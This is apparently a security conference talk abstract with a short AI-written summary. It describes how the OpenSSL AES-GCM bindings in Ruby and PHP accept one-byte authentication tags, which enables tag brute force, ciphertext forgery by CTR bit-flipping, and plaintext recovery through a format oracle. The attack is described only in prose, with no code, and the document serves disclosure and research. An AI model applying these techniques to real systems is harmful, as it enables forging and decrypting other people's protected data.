Exploiting the not so misuse-resistant AES-GCM API of OpenSSL
Félix Charette
NorthSec 2025 · Day 2 · Ville-Marie
AES-GCM is theoretically sound, but OpenSSL's bindings for Ruby and PHP contain a well-documented — yet widely overlooked — flaw: neither language's standard decrypt function validates that the authentication tag is the correct length. A one-byte tag is accepted as readily as a full sixteen-byte tag. This reduces the integrity check from a cryptographically strong guarantee to a brute-force target of 256 guesses, enabling ciphertext forgery and, under certain conditions, full plaintext recovery via a format-validity oracle attack. Félix Charette walks through how to identify vulnerable codepaths, craft shortened-tag payloads, flip ciphertext bits under CTR mode, and decrypt unknown values by observing parsing behaviour. ---
AI review
Félix Charette demonstrates that Ruby and PHP's OpenSSL AES-GCM bindings accept authentication tags of arbitrary length — including one byte — reducing the integrity guarantee to a 256-guess brute force. Walk-through covers identification methodology, CTR bit-flipping for ciphertext forgery, and format validity oracle attacks for key-free plaintext recovery.